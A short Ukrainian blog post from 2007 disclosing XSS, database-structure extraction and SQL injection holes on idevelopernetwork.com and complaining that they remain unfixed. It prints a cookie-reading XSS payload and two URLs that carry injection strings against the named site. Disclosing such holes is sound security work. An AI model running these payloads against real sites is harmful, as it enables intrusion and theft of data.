Уразливості на www.idevelopernetwork.com

19:38 20.12.2007

28.07.2007

У січні, 31.01.2007, я знайшов Cross-Site Scripting, SQL DB Structure Extraction та SQL Injection уразливості на сайтіі http://www.idevelopernetwork.com. Про що найближчим часом сповіщу адміністрацію сайта.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

20.12.2007

XSS:

alert(document.cookie) (IE)
цікавий (IE)

SQL DB Structure Extraction:

http://www.idevelopernetwork.com/resources/index.html?q=%27

SQL Injection:

http://www.idevelopernetwork.com/resources/index.html?q=%27%20OR%20LINKDESC%20LIKE%20%27

Дані уразливості досі не виправлені. Що дуже несерйозно.

This entry was posted on 19:38 20.12.2007 and is filed under Уразливості. You can follow any responses to this entry through the RSS 2.0 feed.

You must be logged in to post a comment.

Websecurity - Веб безпека

Уразливості на www.idevelopernetwork.com

Leave a Reply

Меню

Категорії

Останні повідомлення

Архів +-

Мета